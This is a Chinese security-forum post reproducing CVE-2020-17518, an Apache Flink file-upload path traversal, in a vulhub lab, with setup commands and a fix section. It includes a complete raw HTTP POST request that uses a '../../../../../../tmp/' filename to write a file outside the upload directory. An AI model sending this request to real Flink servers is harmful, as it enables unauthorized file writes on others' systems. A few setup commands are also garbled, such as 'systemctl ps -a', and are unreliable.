用户
搜索

该用户从未签到

i春秋-呆萌菜鸟

Rank: 1

1

主题

1

帖子

15

魔法币
收听
0
粉丝
0
注册时间
2021-4-6
发表于 2021-9-8 11:37:39 11847

基本概要:
危害及别危害及别:高危
披露信息分析:

官方披露链接如下:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17518
影响版本:
version 1.5.1 至 1.11.2
我选择了1.11.2版本进行搭建环境

环境搭建环境搭建:

使用vulhub进行安装:
Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。Vulhub官网地址:https://vulhub.org
安装步骤(kali环境下):
(1)安装docker,输入如下命令:
apt install docker.io
等待几分钟查看版本,是否安装成功:
docker -v
启动docker:
systemctl ps -a
(2)安装pip:
apt-get install python3-pip
(3)安装docker-compose:
pip3 install docker-compose
查看docker-compose版本:
Docker-compose -v
(4)下载vulhub:
git clone https://github.com/vulhub/vulhub.git
(5)下载完成进入vulhub内漏洞目录:
cd /vulhub/flink/CVE-2020-17518
(6)启动环境
docker-compose build
docker-compose up -d

(7)查看端口,并在浏览器访问:
docker-compose ps

浏览器访问成功,则环境搭建完成。

POC构造:

在以下页面进行文件上传:

poc为:
将数据包改为:
POST /jars/upload HTTP/1.1
Host: x.x.x.x:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://x.x.x.x:8081/
Content-Length: 254
Content-Type: multipart/form-data; boundary=---------------------------293322026221554
DNT: 1
Connection: close

-----------------------------293322026221554
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/ceshi.php"
Content-Type: application/octet-stream

111
-----------------------------293322026221554--

发送后返回值为400:

但文件已经上传:

漏洞修复:

标准解决方案:更新到安全版本。
参考链接:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17518
临时修复方案:修改服务器中文件夹权限,使文件夹无法进行写入。

参考链接:

Vulhub解析及环境搭建:https://vulhub.org/#/environments/flink/CVE-2020-17518/

发表于 2021-9-8 17:17:51
感谢分享
剑未佩妥出门已是江湖
使用道具 举报 回复
发新帖
您需要登录后才可以回帖 登录 | 立即注册